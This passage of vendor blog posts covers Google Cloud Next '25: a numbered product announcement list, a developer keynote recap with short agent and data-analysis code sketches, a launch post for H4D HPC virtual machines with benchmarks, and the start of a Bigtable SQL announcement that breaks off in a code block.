160. New advanced workload management capabilities, now GA, scale resources, manage workloads, and help ensure their cost-effectiveness.
161. BigQuery spend commit, now GA, simplifies purchasing, unifying spend across BigQuery data processing engines, streaming, governance, and more.
162. BigQuery DataFrames now has AI code assist capabilities in preview, letting you use natural language prompts to generate or suggest code in SQL or Python, or to explain an existing SQL query.
163. SQL translation assistance, now GA, is an AI-based translator that lets you create Gemini-enhanced rules to customize your SQL translations, to accelerate BigQuery migrations.
164. Catalog metadata export, GA, enables bulk extract of catalog entries into Cloud Storage.
165. Automatic at-scale cataloging of BigLake and object tables in BigQuery is now GA.
166. BigQuery managed disaster recovery is now GA, featuring automatic failover coordination, continuous near-real-time data replication to a secondary region, and fast, transparent recovery during outages.
167. New workload management capabilities in preview include reservation-level fair sharing of slots, predictability in performance of reservations, and enhanced observability through reservation attribution in billing.
Looker is adding a host of new conversational and visual capabilities, accelerated by AI and aimed at making BI accessible and useful to all users:
168. Gemini in Looker features are now available to all Looker platform users, including Conversational Analytics, Visualization Assistant, Formula Assistant, Automated Slide Generation, and LookML Code Assistant.
169. Code Interpreter for Conversational Analytics is in preview, allowing business users to perform forecasting and anomaly detection using natural language without needing deep Python expertise. Learn more and sign up for it here.
170. New Looker reports feature an intuitive drag-and-drop interface, granular design controls, a rich library of visualizations and templates, and real-time collaboration capabilities, now in the core Looker platform.
171. With Google Cloud’s acquisition of Spectacles.dev, developers can automate testing and validation of SQL and LookML changes using CI/CD practices.
Firebase
172. The new Firebase Studio, available to everyone in preview, is a cloud-based, agentic development environment powered by Gemini that includes everything developers need to create and publish production-quality full-stack AI apps quickly, all in one place. Gemini Code Assist agents are available via private preview.
173. Genkit, an open-source framework for building AI-powered applications in your preferred language, now has early support for Python and expanded support for Go. Try this template in Firebase Studio to build with Genkit.
174. Vertex AI in Firebase now includes support for the Live API for Gemini models, enabling more conversational interactions in apps, such as letting customers ask audio questions and get responses.
175. Firebase Data Connect is now GA, offering the reliability of Cloud SQL for PostgreSQL with instant GraphQL APIs and type-safe SDKs.
176. Firebase App Hosting is also GA, providing an opinionated, git-centric hosting solution for modern, full-stack web apps.
177. A new App Testing agent within Firebase App Distribution, also in preview, prepares mobile apps for production by generating, managing, and executing end-to-end tests.
Google Cloud Consulting
Google Cloud Consulting introduced several new pre-packaged service offerings:
178. Agentspace Accelerator provides a structured approach to connecting and deploying AI-powered search within organizations, so employees can easily access relevant internal information and resources when they need them.
180. Oracle on Google Cloud lets customers combine Oracle databases and applications with Google Cloud’s advanced platform and AI capabilities for enhanced database and network performance.
181. We expanded access to Delivery Navigator, a series of proven delivery methodologies and best practices that help with migrations and technology implementations, to customers as well as partners, in preview.
Networking
182. Cloud WAN, a Cross-Cloud Network solution, is a fully managed, reliable, and secure enterprise backbone that makes Google’s global private network available to all Google Cloud customers. Cloud WAN delivers up to 40% improved network performance, while reducing total cost of ownership by up to 40%. Read more here.
183. The new 400G Cloud Interconnect and Cross-Cloud Interconnect, available later this year, offer up to 4x more bandwidth than our 100G Cloud Interconnect and Cross-Cloud Interconnect, providing connectivity from on-premises or other cloud environments to Google Cloud.
184. Build massive AI services with networking support for up to 30,000 GPUs per cluster in a non-blocking configuration, available in preview now.
185. Zero-Trust RDMA security helps you secure your high-performance GPU and TPU traffic with our RDMA firewall, featuring dynamic enforcement policies. Available later this year.
186. Get accelerated GPU-to-GPU communication, with up to 3.2Tbps of non-blocking GPU-to-GPU bandwidth with our high-throughput, low-latency RDMA networking, now generally available.
188. Cloud Load Balancing has optimizations for LLM inference, letting you leverage NVIDIA GPU capacity across multiple cloud providers or on-prem infrastructure.
189. New Service Extensions plugins, powered by WebAssembly (Wasm), let you automate, extend, and customize your applications with plugin examples in Rust, C++, and Go. Support for Cloud Load Balancing is now generally available, and Cloud CDN support will follow later this year.
190. Cloud CDN’s fast cache invalidation delivers static and dynamic content at global scale with improved performance, now in preview.
191. TLS 1.3 0-RTT in Cloud CDN boosts application performance for resumed connections, now in preview.
192. App Hub provides streamlined service discovery and management by automating service discovery and cataloging.
193. App Hub service health enables resilient global services with network-driven cross-regional failover. Available later this year.
194. Later in 2025, you’ll be able to use Private Service Connect to publish multiple services within a single GKE cluster, making them natively accessible from non-peered GKE clusters, Cloud Run, or Service Mesh.
Then, to help you secure your workloads, we introduced enhancements to protect distributed applications and internet-facing services against network attacks:
195. The new DNS Armor detects DNS-based data exfiltration attacks performed using DNS tunneling, domain generation algorithms (DGA) and other sophisticated techniques. Available in preview later this year.
196. New hierarchical policies for Cloud Armor let you enforce granular protection of your network architecture.
197. There are new network types and firewall tags for Cloud NGFW hierarchical firewall policies, coming this quarter in preview.
198. Cloud NGFW adds new layer 7 domain filtering, allowing firewall administrators to monitor and control outbound web traffic to only allowed destinations. Coming later in 2025.
199. Inline network DLP for Secure Web Proxy and Application Load Balancer provides real-time protection for sensitive data in transit via integration with third-party solutions (such as Symantec DLP) using Service Extensions. In preview this quarter.
200. Network Security Integration, now generally available, helps you maintain consistent policies across hybrid and multi-cloud environments without changing your routing policies or network architecture.
We’ve always taken an open approach to AI, and the same is true for agentic AI. With updates this week at Next ‘25, we’re now infusing partners at every layer of our agentic AI stack to enable multi-agent ecosystems. Here’s a closer look:
202. Expert AI services: Our ecosystem of services partners — including Accenture, BCG, Capgemini, Cognizant, Deloitte, HCLTech, Infosys, KPMG, McKinsey, PwC, TCS, and Wipro — has actively contributed to the A2A protocol and will support its implementation.
203. AI Agent Marketplace: We launched a new AI Agent Marketplace — a dedicated section within Google Cloud Marketplace that allows customers to browse, purchase, and manage AI agents built by partners including Accenture, BigCommerce, Deloitte, Elastic, UiPath, Typeface, and VMware, with more launching soon.
204. Power agents with all your enterprise data: We are partnering with NetApp, Oracle, SAP, Salesforce, and ServiceNow to allow agents to access data stored in these popular platforms.
205. Better field alignment and co-sell: We introduced new processes to better capture and share partners’ critical contributions with our sales team, including increased visibility into co-selling activities like workshops, assessments, and proofs-of-concept, as well as partner-delivered services.
206. More partner earnings: We are evolving incentives to help partners capitalize on the biggest opportunities, such as a 2x increase in partner funding for AI opportunities over the past year. We also introduced new AI-powered capabilities in Earnings Hub, our destination for tracking incentives and growth.
207. We partnered with Adobe, the leader in creativity, to bring our advanced Imagen 3 and Veo 2 models to applications like Adobe Express.
208. Together with Salesforce’s Agentforce, we’re leading the digital labor revolution, driving massive gains in human augmentation, productivity, efficiency, and customer success.
Security
We offer critical cyber defense capabilities for today’s challenging threat environment, and introduced a number of new innovations:
209. Google Unified Security: This solution brings together our visibility, threat detection, AI-powered security operations, continuous virtual red-teaming, the most trusted enterprise browser, and Mandiant expertise — in one converged security solution running on a planet-scale data fabric.
210. Alert triage agent: This agent performs dynamic investigations on behalf of users. It analyzes the context of each alert, gathers relevant information, and renders a verdict on the alert, along with a history of the agent’s evidence and decision making.
211. Malware analysis agent: This agent investigates whether code is safe or harmful. It builds on Code Insight to analyze potentially malicious code, including the ability to create and execute scripts for deobfuscation.
212. In Google Security Operations, new data pipeline management capabilities can help customers better manage scale, reduce costs, and satisfy compliance mandates.
213. We also expanded our Risk Protection Program, which provides discounted cyber-insurance coverage based on cloud security posture, to welcome new program partners Beazley and Chubb, two of the world’s largest cyber-insurers.
214. New employee phishing protections in Chrome Enterprise Premium use Google Safe Browsing data to help protect employees against lookalike sites and portals attempting to capture credentials.
215. The Mandiant Retainer provides on-demand access to Mandiant experts. Customers now can redeem prepaid funds for investigations, education, and intelligence to boost their expertise and resilience.
216. Mandiant Consulting is also partnering with Rubrik and Cohesity to create a solution to minimize downtime and recovery costs after a cyberattack.
Storage
Storage is a critical component for minimizing bottlenecks in both training and inference, and we introduced new innovations to help:
217. We expanded Hyperdisk Storage Pools to store up to 5 PiB of data in a single pool — a 5x increase from before.
218. Hyperdisk Exapools is the biggest and fastest block storage in any public cloud, with exabytes of storage delivering terabytes per second of performance.
219. Hyperdisk ML can now hydrate from Cloud Storage using GKE volume populator.
220. Rapid Storage is a new Cloud Storage zonal bucket type with <1ms random read and write latency; compared to other leading hyperscalers, it offers 20x faster data access, 6 TB/s of throughput, and 5x lower latency for random reads and writes.
221. Anywhere Cache is a new strongly consistent cache that works seamlessly with existing regional buckets to cache data within a selected zone. It reduces latency by up to 70% and delivers up to 2.5 TB/s of throughput, accelerating AI workloads by keeping data close to GPUs and TPUs to maximize goodput.
222. The new Google Cloud Managed Lustre is a high-performance, fully managed parallel file system built on DDN EXAScaler. This zonal storage solution provides PB-scale capacity, <1ms latency, millions of IOPS, and TB/s of throughput for AI workloads.
223. Storage Intelligence, the industry’s first offering enabling customers to generate storage insights specific to their environment by querying object metadata at scale, uses LLMs to provide insights into data estates, as well as take actions on them.
Startups
224. We announced a significant new partnership with the leading venture capital firm Lightspeed, which will make it easier for Lightspeed-backed startups to access technology and resources through the Google for Startups Cloud Program. This includes upwards of $150,000 in cloud credits for Lightspeed’s AI portfolio companies, on top of existing credits available to all qualified startups through the Google for Startups Cloud Program.
225. The new Startup Perks program provides early stage startups with preferred access to solutions from our partners like Datadog, Elastic, ElevenLabs, GitLab, MongoDB, NVIDIA, Weights & Biases, and more.
226. Google for Startups Cloud Program members will receive an additional $10,000 in credits to use exclusively on Partner Models through Vertex AI Model Garden, so they can quickly start using both Gemini models and models from partners like Anthropic and Meta.
Google Workspace: AI-powered productivity
Gemini not only powers best-in-class AI capabilities as a model, but also Google’s own products, like Google Workspace, which includes popular apps like Gmail, Docs, Drive, and Meet. We announced a number of new Workspace innovations to further empower users with AI, including:
227. Help me Analyze: This powerful feature transforms Google Sheets into your personal business analyst, intelligently identifying insights from your data without the need for explicit prompting, empowering you to make data-driven decisions with ease.
228. Docs Audio Overview: With audio overviews in Docs, you can create high-quality, human-like audio read-outs or podcast-style summaries of your documents.
229. Google Workspace Flows: Workspace Flows helps you automate daily work and repetitive tasks like managing approvals, researching customers, organizing your email, summarizing your daily agenda, and much more.
There’s no place like home
And with that, we’ve come to the end of Next 25. We hope you’ve enjoyed your time in Las Vegas, and wish you safe travels.
See you in Vegas next year for Google Cloud Next: April 22 – 24, 2026.
1. Grounding with Google Maps is currently available as an experimental release in the United States, providing access to only places data in the United States.
Attending a tech conference like Google Cloud Next can feel like drinking from a firehose — all the news, all the sessions and breakouts, all the learning and networking… But after a busy couple of days, watching the developer keynote makes it seem like there’s a method to the madness. A coherent picture starts to emerge from all the things you’ve seen, pointing the way to all the cool things you can do when you get back to your desk.
This year, the developer keynote was hosted by the inimitable duo of Richard Seroter, Google Cloud Chief Evangelist, and Stephanie Wong, Head of Developer Skills and Community, plus a whole host of experts from around Google Cloud product, engineering, and developer advocacy teams. The keynote itself was organized around a noble, relatable goal: Use AI to help remodel AI Developer Experience Engineer Paige Bailey’s 1970s era kitchen. But how?
It all starts with a prompt
The generative AI experience starts by prompting a model with data and your intent. Paige was joined on stage by Logan Kilpatrick, Senior Product Manager at Google DeepMind. There, Logan and Paige prompted AI Studio to analyze Paige’s kitchen, supplying it with text descriptions, floor plans, and images. In return, it suggested cabinets, a cohesive design, color palette, and materials, relying on Gemini’s native image generation capabilities to bring its ideas to life. Then, to answer important questions on cost, especially for Paige’s area, they used Grounding with Google Search to pull in real-world material costs, local building codes and regulations, and other relevant information.
As Logan said, “From understanding videos, to native image generation, to grounding real information with Google Search – these are things that can only be built with Gemini.”
Gemini 2.5 Flash — our workhorse model optimized specifically for low latency and cost efficiency — is coming soon to Vertex AI, AI Studio, and the Gemini app.
From prompt to agent
We all know that a prompt is the heart of a generative AI query. “But what the heck is an agent?” asked Richard. “That’s the million-dollar question.”
“An agent is a service that talks to an AI model to perform a goal-based operation using the tools and context it has,” Stephanie explained. And how do you go from prompt to agent? One way is to use Vertex AI, our comprehensive platform for building and managing AI applications and agents, and Agent Development Kit (ADK), an open-source framework for designing agents. ADK makes it easier than ever to get started with agents powered by Gemini models and Google AI tools.
Dr. Fran Hinkelman, Developer Relations Engineering Manager at Google Cloud, took the stage to show off ADK. An agent needs three things, Fran explained: 1) instructions to define the agent’s goal, 2) tools to enable it to act, and 3) a model to handle the LLM’s tasks.
Fran wrote the agent code using Python, and in a matter of minutes, deployed it, and got a professionally laid out PDF that outlined everything a builder might need to get started on a kitchen remodel. “What a massive time-saver,” Fran said.
New things that make this possible:
Agent Development Kit (ADK) is our new open-source framework that simplifies the process of building agents and sophisticated multi-agent systems while maintaining precise control over agent behavior. With ADK, you can build an AI agent in under 100 lines of intuitive code (see the sketch below).
ADK support for Model Context Protocol (MCP), which creates a standardized structure and format for all the information an LLM needs to process a data request.
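As a hedged illustration of the three ingredients Fran listed, here is a minimal sketch of a single ADK agent; the cost-estimate tool and model name are our own assumptions, not the keynote’s actual code:

```python
# Minimal ADK sketch (pip install google-adk). The cost-estimate tool and the
# model name are illustrative assumptions, not the keynote's actual code.
from google.adk.agents import Agent

def estimate_remodel_cost(square_feet: float) -> dict:
    """Hypothetical tool: return a rough kitchen-remodel cost range in USD."""
    return {"low_usd": square_feet * 150, "high_usd": square_feet * 350}

# 1) instructions define the goal, 2) tools let the agent act, and
# 3) the model handles the LLM's tasks.
root_agent = Agent(
    name="kitchen_remodel_agent",
    model="gemini-2.0-flash",
    instruction="Plan a kitchen remodel and produce a builder-ready summary.",
    tools=[estimate_remodel_cost],
)
```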
From one agent to many
It’s one thing to build an agent. It’s another to orchestrate a collection of agents — exactly the kind of thing you need for a complex process like remodeling a kitchen. To show you how, Dr. Abirami Sukumaran, Staff Developer Advocate at Google Cloud, used ADK to create a multi-agent ecosystem with three types of agents: 1) a construction proposal agent 2) a permits and compliance agent 3) an agent for ordering and delivering materials.
And when the multi-agent system was ready, she deployed it directly from ADK to Vertex AI Agent Engine, a fully managed agent runtime that supports many agent frameworks including ADK.
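A multi-agent system like the one Abirami demonstrated can be sketched in ADK by composing specialist sub-agents under a coordinator; the three agents below are illustrative stand-ins for her proposal, permits, and materials agents:

```python
# Hedged sketch of an ADK multi-agent hierarchy, loosely mirroring the demo:
# a coordinator delegates tasks to three specialist sub-agents.
from google.adk.agents import Agent

proposal = Agent(name="proposal_agent", model="gemini-2.0-flash",
                 instruction="Draft construction proposals.")
permits = Agent(name="permits_agent", model="gemini-2.0-flash",
                instruction="Check permits and code compliance.")
materials = Agent(name="materials_agent", model="gemini-2.0-flash",
                  instruction="Order and schedule delivery of materials.")

coordinator = Agent(
    name="remodel_coordinator",
    model="gemini-2.0-flash",
    instruction="Route each remodeling task to the right specialist.",
    sub_agents=[proposal, permits, materials],  # ADK handles the delegation
)
```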
It gets better: After deploying her agent, Abirami tested it out in Google Agentspace, a hub for sharing your own agents and those from third-parties.
There was a problem, though. Midway through, the agent system appeared to fail. Abirami sprang into action, launching Gemini Cloud Assist Investigations, which used Logs Explorer to return relevant observations and hypotheses about the source of the problem. It even supplied a recommended code fix for the agents. Abirami examined the code, accepted it, redeployed her agents, and saved the day.
This is really key. “It’s hard enough to build systems that orchestrate complex agents and services,” Abirami said. “Developers shouldn’t have to sit around debugging multiple dependencies — getting to the logs, going through the code, all of this can take a lot of time and resources that devs typically don’t have.”
New things that make this possible:
Vertex AI Agent Engine is a fully managed runtime in Vertex AI that helps you deploy your custom agents to production with built-in testing, release, and reliability at a global, secure scale.
Cloud Assist Investigations helps diagnose problems with infrastructure and even issues in the code.
Agent2Agent (A2A) protocol: We’re proud to be the first hyperscaler to create an open protocol to help enterprises support multi-agent ecosystems, so agents can communicate with each other, regardless of the underlying technology.
Choose your own IDE and models
“Have you heard of vibe coding?” asked our next presenter, Debi Cabrera, Senior Developer Advocate at Google Cloud, referring to agentic coding. Essentially, people can prompt an agent with ideas as well as code to get an effective programming output. More and more people are doing it with Windsurf, a popular new integrated development environment (IDE), and she’s a fan.
Debi also showed using Gemini in Cursor and IntelliJ with Copilot, but you could also use Visual Studio Code, Tabnine, Cognition, or Aider. (She even wrote her prompts in Spanish, which Gemini handled sin problema). At the end of the day, “we’re enabling devs to use Gemini wherever it suits you best,” Debi said.
Alternatively, if you don’t want to use Gemini as your model, you can use one of the more than 200 models in Vertex AI Model Garden, including Llama, Gemma 3, Anthropic, and Mistral, or open-source models from Hugging Face.
“No matter what you use, we’re excited to see what you come up with!”
Android Studio support for Gemini Code Assist is now available in preview.
Gemini in Firebase provides complete AI assistance in the new Firebase Studio.
In a field of dreams
Next up, presenters took a break from Paige’s kitchen remodel to tackle another high-value problem: how to throw a pitch.
With all the data that Major League Baseball processes with Google Cloud — 25 million data points per game — pitching technique is a problem that’s ripe for AI.
Jake DiBattista, winner of the recent Google Cloud x MLB Hackathon, started by analyzing a video of a great left-handed pitcher, Clayton Kershaw. He pre-processed the video using a computer vision library, and stored it in Google Cloud, using selections such as pitch type and game state to pull MLB data. Finally, after sending all this information to the Gemini API, he got his answer: Kershaw threw his signature curveball with nearly no deviation from his ideal.
Impressive, but how well does it work for those of us who aren’t pros? Jake created an “amateur mode” for less experienced players, and used a video of our host, Richard, throwing a pitch! After some prompt engineering to adapt the professional model for Kershaw into an amateur model for Richard, the results were a little more prescriptive: he has potential; he just needs to tighten up his arm a little and use more leg drive to maximize his power.
Jake shared the inspiration for his project: As a shot putter in college, he wanted to measure the accuracy of his throwing technique. How can you improve if you don’t know what you’re doing wrong – or right? Back then, having this kind of data would have been incredibly valuable for his development.
But what’s truly amazing is that Jake built this fully customizable prompt generator for analyzing pitches in just one week. “This essentially worked out of the box,” Jake said. “I didn’t need to implement a custom model or build overly complex datasets.”
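The heart of a project like Jake’s, sending a video and a structured prompt to the Gemini API, can be sketched in a few lines with the google-genai SDK; the file name, model choice, and prompt are placeholders, not his actual pipeline:

```python
# Hedged sketch of video analysis with the google-genai SDK; the file name,
# model, and prompt are placeholders. Assumes an API key in the environment.
from google import genai

client = genai.Client()
video = client.files.upload(file="pitch.mp4")  # large files may take a moment

response = client.models.generate_content(
    model="gemini-2.0-flash",
    contents=[
        video,
        "Analyze this pitching motion. Compare arm slot, release point, and "
        "leg drive against an ideal left-handed curveball delivery.",
    ],
)
print(response.text)
```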
Get back to work
Meanwhile, back at his day job, our next presenter Jeff Nelson, Developer Advocate at Google Cloud, took the stage with a clear goal: to turn raw data into a data application for use by sales managers. He started in BigQuery Notebook to build a forecast and wrote some SQL code. BigQuery loaded the results into a Python DataFrame, because Python makes it easy to use libraries to execute code over tables of any size.
But how can you actually use this agent to forecast sales? Jeff selected the Gemini Data Science Agent built into the Notebook, hit “Ask Agent,” and inputted a prompt that asked for a sales forecast from his table. The best part – from that point onward, all code was generated and executed by the Gemini Data Science Agent.
Plus, he pointed out that the agent used Spark for feature engineering, which is only possible because of our new Serverless Spark engine in BigQuery. Switching between SQL, Spark, and Python is easy, so you can use the right tool for the job.
To build the forecast itself, Jeff used a new Google foundation model, TimesFM, that’s accessible directly from BigQuery. Unlike traditional models, this one comes pre-trained on massive time-series datasets, so you get forecasts by simply inputting data. “The forecast becomes a data app accessible to everyone,” Jeff said.
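As a hedged sketch of what calling TimesFM from BigQuery can look like, the query below uses the AI.FORECAST table function; the table and column names are hypothetical, and the preview function’s exact surface may differ:

```python
# Hedged sketch: TimesFM-powered forecasting from BigQuery via AI.FORECAST.
# Table and column names are hypothetical; the function is in preview and
# its surface may differ.
from google.cloud import bigquery

client = bigquery.Client()
sql = """
SELECT *
FROM AI.FORECAST(
  TABLE `my_project.sales.daily_revenue`,
  data_col => 'revenue',
  timestamp_col => 'day',
  horizon => 30
)
"""
for row in client.query(sql).result():
    print(row.forecast_timestamp, row.forecast_value)
```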
As a developer, how would you like it if you could hand off boring things like creating technical design or product requirement docs? Scott Densmore, Senior Director of Engineering, closed out the demos to show us an incredible way to cut through tedious work: Gemini Code Assist and its new Kanban board.
Code Assist can help you orchestrate agents in all aspects of the software development lifecycle, including with what Scott calls a “backpack” that holds all your engineering context. Using a technical design doc for a Java migration as an example, Scott created a comment and assigned it to Code Assist right from the Google doc. Instantly, the new task shows up on the Kanban board, ready to be tracked. Nor is this capability limited to Google Docs — you can also assign tasks directly from your chatrooms and bug trackers, or have Code Assist proactively find them for you.
Then, he took a tougher example: he asked Code Assist to create a prototype for a product requirement doc. He told Code Assist the changes he wanted, and hit repeat until he was happy with what he saw. Easy.
“Gemini Code Assist provides an extra pair of coding hands to help you create applications and remove repetitive and mundane tasks — so you can focus on the fun stuff.”
New things that make this possible:
Gemini Code Assist Kanban board lets you interact with our agents, review the workplan that Gemini creates to complete the tasks, and track the progress of the various jobs and requests.
Pretty amazing, right? But don’t just take our word for it: for a true sense of all the magic we demonstrated, go ahead and rewatch the full developer keynote. We promise it will be an hour well spent.
At Google Cloud Next, we introduced H4D VMs, our latest machine type for high performance computing (HPC). Building upon existing HPC offerings, H4D VMs are designed to address the evolving needs of demanding workloads in industries such as manufacturing, weather forecasting, EDA, and healthcare and life sciences.
H4D VMs are powered by 5th Generation AMD EPYC™ processors, offering improved whole-node VM performance of more than 12,000 GFLOPS and improved memory bandwidth of more than 950 GB/s. H4D provides low-latency, 200 Gbps network bandwidth using Cloud Remote Direct Memory Access (RDMA) on Titanium, the first of our CPU-based VMs to do so. This powerful combination enables you to efficiently scale your HPC workloads and achieve insights faster.
Figure 1: VM and core performance, as well as memory bandwidth, for H4D vs. C2D and C3D, showing generational improvement
For open-source High-Performance Linpack (OSS-HPL), a widely-used benchmark for measuring the floating-point computing power of supercomputers, H4D offers 1.8x higher performance per VM and 1.6x higher performance per core compared to C3D. Additionally, H4D offers 5.8x higher performance per VM and 1.7x higher performance per core compared to C2D.
For STREAM Triad, a benchmark to measure memory bandwidth, H4D offers 1.3x higher performance per VM and 1.4x higher performance per core compared to C3D. Additionally, H4D offers 3x higher performance per VM and 1.4x higher performance per core compared to C2D.
Improved HPC application performance
H4D VMs deliver strong compute performance and memory bandwidth, significantly outperforming previous generations of AMD-based VMs like C2D and C3D. This allows for faster simulations and analysis, with significant performance gains (relative to C2D, a prior-generation AMD-based HPC VM) across various HPC applications and benchmarks, as illustrated below:
Manufacturing
CFD apps like Siemens™ Simcenter STAR-CCM+™/HIMach show up to 3.6x improvement.
CFD apps like Ansys Fluent/f1_racecar_140 show up to 3.6x improvement.
FEA Explicit apps like Altair Radioss/T10m show up to 3.6x improvement.
CFD apps like OpenFoam/Motorbike_20m show up to 2.9x improvement.
FEA Implicit apps like Ansys Mechanical/gearbox show up to 2.7x improvement.
Healthcare and life sciences
Molecular Dynamics (GROMACS) shows up to 5x improvement.
Weather forecasting
Industry standard benchmark WRFv4 shows up to 3.6x improvement.
Figure 2: Single VM HPC Application performance (speed-up) of H4D, C3D and C2D relative to C2D. Applications ran on single VMs using all cores.
“Our deep collaboration with Google Cloud powers the next generation of cloud-based HPC with the announcement of the new H4D VMs. Google Cloud has leveraged the architectural advances of our 5th Gen AMD EPYC CPUs to create an offering that delivers impressive performance uplift compared to previous generations across a variety of HPC benchmarks. This will empower customers to achieve fast insights and accelerate their most demanding HPC workloads.” – Ram Peddibhotla, corporate vice president, Cloud Business, AMD
Faster HPC with Cloud RDMA on Titanium
H4D’s performance is made possible with Cloud RDMA, a new Titanium offload that’s available for the first time on these VMs. Cloud RDMA is specifically engineered to support HPC workloads that rely heavily on inter-node communication, such as computational fluid dynamics, weather modeling, molecular dynamics, and more. By offloading network processing, Cloud RDMA provides predictable, low-latency, high-bandwidth communication between compute nodes, thus minimizing host CPU bottlenecks.
Under the hood, Cloud RDMA uses Google’s innovative Falcon hardware transport for reliable, low-latency communication over our Ethernet-based data center networks, effectively resolving the traditional challenges of RDMA over Ethernet while helping to ensure predictable, high performance at scale.
Cloud RDMA over Falcon speeds up simulations by efficiently utilizing more computational resources. For example, for smaller CFD problems like OpenFoam/motorbike_20m and Simcenter Star-CCM+/HIMach10, which have limited inherent parallelism and are typically challenging to accelerate, H4D results in 3.4x and 1.9x speedup, respectively, on four VMs compared to TCP.
Figure 3: Left: OpenFoam/Motorbike_20m offers a 3.4x improvement with H4D Cloud RDMA over TCP at four VMs. Right: Simcenter STAR-CCM+/HIMach10 offers a 1.9x improvement with H4D Cloud RDMA over TCP at four VMs.
For larger models, Falcon also helps maintain strong scaling. Using 32 VMs, Falcon achieved a 2.8x speedup over TCP for GROMACS/Lignocellulose and a 1.3x speedup for WRFv4/Conus 2.5km.
Figure 4: Left: GROMACS/Lignocellulose offers a 2.8x improvement with H4D Cloud RDMA over TCP at 32 VMs. Right: WRFv4/Conus 2.5km offers a 1.3x improvement with H4D Cloud RDMA over TCP at 32 VMs.
Cluster management and scheduling capabilities
H4D VMs will support both Dynamic Workload Scheduler (DWS) and Cluster Director (formerly known as Hypercompute Cluster).
DWS helps schedule HPC workloads for optimal performance and cost-effectiveness, providing resource availability for time-sensitive simulations and flexible HPC jobs.
Cluster Director, which lets you deploy and scale a large, physically-colocated accelerator cluster as a single unit, is now extending its capabilities to HPC environments. Cluster Director simplifies deploying and managing complex HPC clusters on H4D VMs by allowing researchers to easily set up and run large-scale simulations.
VM sizes and regional availability
We offer H4D VMs in both standard and high-memory configurations to cater to diverse workload requirements. We also provide options with local SSD for workloads that demand high-speed storage, such as CPU-based seismic processing and structural mechanics applications (e.g., Abaqus, NASTRAN, Altair OptiStruct and Ansys Mechanical).
VM | Cores | Memory (GB) | Local SSD
h4d-highmem-192-lssd | 192 | 1,488 | 3.75 TB
h4d-standard-192 | 192 | 720 | N/A
h4d-highmem-192 | 192 | 1,488 | N/A
H4D VMs are currently available in us-central1-a (Iowa) and europe-west4-b (Netherlands), with additional regions in progress.
What our customers and partners are saying
“With the power of Google’s new H4D-based clusters, we are poised to simulate systems approaching a trillion particles, unlocking unprecedented insights into circulatory functions and diseases. This leap in computational capability will dramatically accelerate our pursuit of breakthrough therapeutics, bringing us closer to effective precision therapies for blood vessel damage in heart disease.” – Petros Koumoutsakos, Jr. Professor of Computing in Science and Engineering, Harvard University
“The launch of Google Cloud’s H4D platform marks a significant advancement in engineering simulation. As GCP’s first VM with RDMA over Ethernet, combined with higher memory bandwidth, generous L3 cache, and AVX-512 instruction support, H4D delivers up to 3.6x better performance for Ansys Fluent simulations compared to C2D VMs. This performance boost allows our customers to run simulations faster, explore a wider range of design options, and drive innovation with greater efficiency.” – Wim Slagter, Senior Director of Partner Programs, Ansys
“The generational performance leap achieved with Google H4D VMs, powered by the 5th Generation AMD EPYC™, is truly remarkable. For compute-intensive, highly non-linear simulations, such as car crash analysis, Altair® Radioss® delivers a stunning 3.6x speedup. This breakthrough paves the way for faster and more accurate simulations, which is crucial for our customers in the era of the digital thread!” – Eric Lequiniou, SVP Radioss Development and Altair Solvers HPC
“The latest H4D VMs, powered by 5th Generation AMD EPYC Processors and Cloud RDMA, allow our customers to realize faster time-to-results for their Simcenter STAR-CCM+ simulations. For HIMach10, we’re seeing up to 3.6x performance gains compared to the C2D instance and 1.9x speedup on four H4D Cloud RDMA VMs compared to TCP. Our partnership with Google has been key to achieving these reduced simulation times.” – Lisa Mesaros, Vice President, Simcenter Solution Domains Product Management, Siemens
Want to try it out?
We’re excited to see how H4D VMs will empower you to achieve faster results with your HPC workloads! Sign up for the preview by filling out this form.
For decades, businesses have wrestled with unlocking the true potential of their data for real-time operations. Bigtable, Google Cloud’s pioneering NoSQL database, has been the engine behind massive-scale, low-latency applications that operate at a global scale. It was purpose-built for the challenges faced in real-time applications, and remains a key piece of Google infrastructure, powering products including YouTube and Ads.
This week at Google Cloud Next, we announced continuous materialized views, an expansion of Bigtable’s SQL capabilities. Bigtable SQL and continuous materialized views enable users to build fully managed, real-time application backends using familiar SQL syntax, including specialized features that preserve Bigtable’s flexible schema — a vital aspect of real-time applications.
Whether you’re building streaming applications, real-time aggregations, or global AI analysis on a continuous data stream, Bigtable just got a whole lot easier — and much more powerful.
Bigtable’s SQL interface, now generally available
Bigtable recently transformed the developer experience by adding SQL support, now generally available. SQL support makes it easier for development teams to work with Bigtable’s flexibility and speed.
Bigtable SQL interface in Bigtable Studio
The Bigtable SQL interface enhances accessibility and streamlines application development by facilitating rapid troubleshooting and data analysis. This unlocks new use cases, like real-time dashboards utilizing distributed counting for instant metric retrieval and improved product search through K nearest neighbors (KNN) similarity search. A wide range of customers, spanning innovative AI startups to traditional financial institutions, are enthusiastic about Bigtable SQL’s potential to broaden developer access to Bigtable’s capabilities.
“Imagine coding with AI that understands your entire codebase. That’s Augment Code, an AI coding platform that gives you context in every feature. Bigtable’s robustness and scaling enable us to work with large code repositories. Its ease of use allowed us to build security features that safeguard our customers’ valuable intellectual property. As our engineering team grows, Bigtable SQL will make it easier to onboard new engineers who can immediately start to work with Bigtable’s fast access to structured, semi-structured, or unstructured data while using a familiar SQL interface,” said Igor Ostrovsky, co-founder and CTO, Augment.
“Equifax leverages Bigtable within our proprietary data fabric for the high-performance storage of financial journals. Our data pipeline team evaluated Bigtable’s SQL interface and found it to be a valuable tool for directly accessing our enterprise data assets and improved Bigtable’s ease of use for SQL-experienced teams. This means more of our team can work efficiently with Bigtable and we anticipate boosted productivity and better integration capabilities,” said Varadarajan Elangadu Raghunathan and Lakshmi Narayanan Veena Subramaniyam, vice-presidents, Data Fabric Decision Science.
Bigtable SQL has also been praised for offering a smooth migration path from databases with distributed key-value architectures and SQL-based query languages, including Cassandra (CQL) and HBase with Apache Phoenix.
“At Pega, we are building real-time decisioning applications that require very low latency query responses to make sure our clients get real-time data to drive their business. The new SQL interface in Bigtable is a compelling option for us as we look for alternatives to our existing database,” said Arjen van der Broek, principal product manager, Data and Integrations, Pega.
This week, Bigtable is also adding new preview functionality to its SQL language, including GROUP BYs and aggregations, an UNPACK transform for working with timestamped data, and structured row keys for working with data stored in a multi-part row key.
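To give a feel for the SQL interface from application code, here is a minimal, hedged sketch using the Bigtable data client’s execute_query method; the project, instance, table, and column family names are hypothetical:

```python
# Minimal sketch of Bigtable SQL from Python via the async data client;
# project, instance, table, and column family names are hypothetical,
# and details of the client surface may differ.
import asyncio
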